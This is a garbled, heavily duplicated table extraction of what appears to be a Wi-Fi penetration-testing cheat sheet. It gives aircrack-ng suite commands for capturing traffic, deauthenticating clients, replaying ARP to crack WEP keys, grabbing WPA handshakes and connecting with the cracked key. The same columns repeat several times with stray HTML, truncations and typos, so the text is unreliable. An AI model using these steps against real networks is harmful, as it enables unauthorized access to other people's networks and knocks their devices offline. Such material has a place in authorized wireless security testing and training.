iwconfig wlan0 essid \$ESSID ap any Connect using WEP: # iwconfig wlan0 essid \$ESSID key \$PASSWORD &amp;&amp; dhclient wlan0 Connect using WPA/WPA2: Stop interfering programs (see setup). Create wpa_supplicant.conf: # wpa_passphrase \$ESSID \$PASSWORD &gt; wpa_supplicant.conf Connect to the network. # wpa_supplicant - cwpa_supplicant.conf -iwlan0 -B &amp;&amp; dhclient wlan0 Recommended resources: BackTrack 5 Wireless Penetration Testing www.routerpwn.com www.routerpwn.com www.routerpwn.com</pre>                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-<br>prefixchannel \$chanbssid \$bssid<br>A number is appended to the end of output-file-<br>prefix every time, so it is OK to use the same prefix<br>multiple times – it will not overwrite your saved<br>data.<br>03.a. UNCOVER HIDDEN ESSID<br>You must capture a Probe frame sent by a client<br>machine as it connects to the network.<br>Passive: Wait. Eventually it will happen on its own<br>and the ESSID will appear in either the top (access<br>points) or bottom (clients) portion of the currently<br>wurning airodum and                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00<br>in the top right.<br>Passive: Wait for a device to connect to the<br>network.<br>Active: Deauthenticate a device currently<br>connected to the network and capture the<br>handshake as it reconnects. In a new terminal<br>window:                                                                                                    | <pre>Disable monitor mode. Enable managed mode.<br/># ifconfig wlan0 down<br/># airmon-ng stop wlan0<br/># iwconfig wlan0 mode managed<br/># ifconfig wlan0 up<br/>Connect to a specific access point on the<br/>network:<br/># iwconfig wlan0 essid \$ESSID ap \$bssid<br/>OR connect to ANY access point on the<br/>network:<br/># iwconfig wlan0 essid \$ESSID ap any<br/>Connect using WEP:<br/># iwconfig wlan0 essid \$ESSID ap any<br/>Connect using WEP:<br/># iwconfig wlan0 essid \$ESSID key<br/>\$PASSWORD &amp;&amp; dhclient wlan0<br/>Connect using WPA/WPA2:<br/>Stop interfering programs (see setup).<br/>Create wpa_supplicant.conf:<br/># wpa_passphrase \$ESSID \$PASSWORD &gt;<br/>wpa_supplicant.conf<br/>Connect to the network.<br/># wpa_supplicant - cwpa_supplicant.conf<br/>-iwlan0 -B &amp;&amp; dhclient wlan0<br/>Recommended resources:<br/>BackTrack 5 Wireless Penetration Testing<br/>www.routerpwn.com<br/>www.renderlab.net/projects/WPA-tables</pre> |
| Start airodump-ng and log captured traffic to a file         # airodump-ng wlan0 -w output-file-prefix         While capturing traffic with airodump, check that traffic to see if AP's support WPS. This saves from having to sniff traffic twice!         # wash -C -f output-file-prefix-*.cap         03. FOCUS ON THE TARGET NETWORK         Stop the currently running airodump-ng (CTRL+C)         Run airodump-ng focused only on the target network         # airodump-ng wlan0 -w output-file-prefixchannel \$chanbssid \$bssid         A number is appended to the end of output-file-prefix every time, so it is OK to use the same prefix multiple times – it will not overwrite your saved data.         03.a. UNCOVER HIDDEN ESSID         You must capture a Probe frame sent by a client machine as it connects to the network.         Passive: Wait. Eventually it will happen on its own and the ESSID will appear in either the top (access points) or bottom (clients) portion of the currently running airodump-ng.                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00<br>in the top right.<br>Passive: Wait for a device to connect to the<br>network.<br>Active: Deauthenticate a device currently<br>connected to the network and capture the<br>handshake as it reconnects. In a new terminal<br>window:<br>Disconnect one:                                                                                                    | <pre>Disable monitor mode. Enable managed mode. # ifconfig wlan0 down # airmon-ng stop wlan0 # iwconfig wlan0 mode managed # ifconfig wlan0 up Connect to a specific access point on the network: # iwconfig wlan0 essid \$ESSID ap \$bssid OR connect to ANY access point on the network: # iwconfig wlan0 essid \$ESSID ap any Connect using WEP: # iwconfig wlan0 essid \$ESSID key \$PASSWORD &amp;&amp; dhclient wlan0 Connect using WPA/WPA2: Stop interfering programs (see setup). Create wpa_supplicant.conf: # wpa_passphrase \$ESSID \$PASSWORD &gt; wpa_supplicant.conf Connect to the network. # wpa_supplicant.conf Connect to the network. # wpa_supplicant.conf Connect to the network. # wpa_supplicant.conf Connect to the network. # wpa_supplicant.conf Connect to the network. # wpa_supplicant.conf wwa.routerpwn.com www.renderlab.net/projects/WPA-tables</pre>                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-<br>prefixchannel \$chanbssid \$bssid<br>A number is appended to the end of output-file-<br>prefix every time, so it is OK to use the same prefix<br>multiple times - it will not overwrite your saved<br>data.<br>03.a. UNCOVER HIDDEN ESSID<br>You must capture a Probe frame sent by a client<br>machine as it connects to the network.<br>Passive: Wait. Eventually it will happen on its own<br>and the ESSID will appear in either the top (access<br>points) or bottom (clients) portion of the currently<br>running airodump-ng.<br>Active: Deauthenticate a connected client and                                                                                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00:00<br>in the top right.<br>Passive: Wait for a device to connect to the<br>network.<br>Active: Deauthenticate a device currently<br>connected to the network and capture the<br>handshake as it reconnects. In a new terminal<br>window:<br>Disconnect one:<br># aireplay-ng -0 5 -a \$bssid -c \$client<br>wlan0                                                                | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap \$bssid<br>OR connect to ANY access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap any<br>Connect using WEP:<br># iwconfig wlan0 essid \$ESSID key<br>\$PASSWORD && dhclient wlan0<br>Connect using WPA/WPA2:<br>Stop interfering programs (see setup).<br>Create wpa_supplicant.conf:<br># wpa_passphrase \$ESSID \$PASSWORD ><br>wpa_supplicant - cwpa_supplicant.conf<br>-iwlan0 - B && dhclient wlan0<br>Recommended resources:<br>BackTrack 5 Wireless Penetration Testing<br>www.renderlab.net/projects/WPA-tables                                                                                                    |
| Start airodump-ng and log captured traffic to a file         # airodump-ng wlan0 -w output-file-prefix         While capturing traffic with airodump, check that traffic to see if AP's support WPS. This saves from having to sniff traffic twice!         # wash -C -f output-file-prefix-*.cap         03. FOCUS ON THE TARGET NETWORK         Stop the currently running airodump-ng (CTRL+C)         Run airodump-ng focused only on the target network         # airodump-ng wlan0 -w output-file-prefixchannel \$chanbssid \$bssid         A number is appended to the end of output-file-prefix every time, so it is OK to use the same prefix multiple times – it will not overwrite your saved data.         03.a. UNCOVER HIDDEN ESSID         You must capture a Probe frame sent by a client machine as it connects to the network.         Passive: Wait. Eventually it will happen on its own and the ESSID will appear in either the top (access points) or bottom (clients) portion of the currently running airodump-ng.         Active: Deauthenticate a connected client and capture the Probe when it reconnects:         # aireplay-ng -0 5 -a \$bssid wlan0                                    | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00<br>in the top right.<br>Passive: Wait for a device to connect to the<br>network.<br>Active: Deauthenticate a device currently<br>connected to the network and capture the<br>handshake as it reconnects. In a new terminal<br>window:<br>Disconnect one:<br># aireplay-ng -0 5 -a \$bssid -c \$client<br>wlan0<br>07. the set the set the                                        | Disable monitor mode. Enable managed mode.<br># ifconfig wlan0 down<br># airmon-ng stop wlan0<br># iwconfig wlan0 mode managed<br># ifconfig wlan0 up<br>Connect to a specific access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap \$bssid<br>OR connect to ANY access point on the<br>network:<br># iwconfig wlan0 essid \$ESSID ap any<br>Connect using WEP:<br># iwconfig wlan0 essid \$ESSID key<br>\$PASSWORD && dhclient wlan0<br>Connect using WPA/WPA2:<br>Stop interfering programs (see setup).<br>Create wpa_supplicant.conf:<br># wpa_passphrase \$ESSID \$PASSWORD ><br>wpa_supplicant.conf<br>Connect to the network.<br># wpa_supplicant - cwpa_supplicant.conf<br>-iwlan0 - B && dhclient wlan0<br>Recommended resources:<br>BackTrack 5 Wireless Penetration Testing<br>www.renderlab.net/projects/WPA-tables                                                                                                    |
| Start airodump-ng and log captured traffic to a<br>file<br># airodump-ng wlan0 -w output-file-<br>prefix<br>While capturing traffic with airodump, check that<br>traffic to see if AP's support WPS. This saves<br>from having to sniff traffic twice!<br># wash -C -f output-file-prefix-*.cap<br>03. FOCUS ON THE TARGET NETWORK<br>Stop the currently running airodump-ng<br>(CTRL+C)<br>Run airodump-ng focused only on the target<br>network<br># airodump-ng wlan0 -w output-file-<br>prefixchannel \$chanbssid \$bssid<br>A number is appended to the end of output-file-<br>prefix every time, so it is OK to use the same prefix<br>multiple times – it will not overwrite your saved<br>data.<br>03.a. UNCOVER HIDDEN ESSID<br>You must capture a Probe frame sent by a client<br>machine as it connects to the network.<br>Passive: Wait. Eventually it will happen on its own<br>and the ESSID will appear in either the top (access<br>points) or bottom (clients) portion of the currently<br>running airodump-ng.<br>Active: Deauthenticate a connected client and<br>capture the Probe when it reconnects:<br># aireplay-ng -0 5 -a \$bssid wlan0<br>For best results, specify the client MAC address | slowly. Open another new window and run:<br># aireplay-ng -3 -b \$bssid -h \$client<br>wlan0<br>If it is taking a while to capture any ARP requests,<br>you can try to speed that up too by opening another<br>window and deauthenticating the client while<br>aireplay-ng is running. When it reconnects it will<br>send an ARP request:<br># aireplay -0 5 -a \$bssid -c \$client<br>wlan0<br>Once the key is cracked, aircrack-ng will display<br>it on screen and save it to output-cracked-<br>key.txt<br>04.b. CRACKING WPA/WPA2 (p85/pdf96)<br>1. Capture the 4-way handshake. This happens<br>when a client device connects to the network. The<br>already running airodump-ng will do this part. On<br>success, airodump-ng displays:<br>[ WPA Handshake: 00:00:00:00:00:00<br>in the top right.<br>Passive: Wait for a device to connect to the<br>network.<br>Active: Deauthenticate a device currently<br>connected to the network and capture the<br>handshake as it reconnects. In a new terminal<br>window:<br>Disconnect one:<br># aireplay-ng -0 5 -a \$bssid -c \$client<br>wlan0<br>OR disconnect them all:<br># aireplay-ng -0 5 -a \$bssid wlan0 | <pre>Disable monitor mode. Enable managed mode. # ifconfig wlan0 down # airmon-ng stop wlan0 # iwconfig wlan0 mode managed # ifconfig wlan0 up Connect to a specific access point on the network: # iwconfig wlan0 essid \$ESSID ap \$bssid OR connect to ANY access point on the network: # iwconfig wlan0 essid \$ESSID ap any Connect using WEP: # iwconfig wlan0 essid \$ESSID key \$PASSWORD &amp;&amp; dhclient wlan0 Connect using WPA/WPA2: Stop interfering programs (see setup). Create wpa_supplicant.conf: # wpa_passphrase \$ESSID \$PASSWORD &gt; wpa_supplicant.conf Connect to the network. # wpa_supplicant.conf Connect to the network. # wpa_supplicant.conf Connect to the network. # wpa_supplicant.conf Connect to the network. # wpa_supplicant.conf Connect to the network. # wpa_supplicant.conf www.routerpwn.com www.renderlab.net/projects/WPA-tables</pre>                                                                                                    |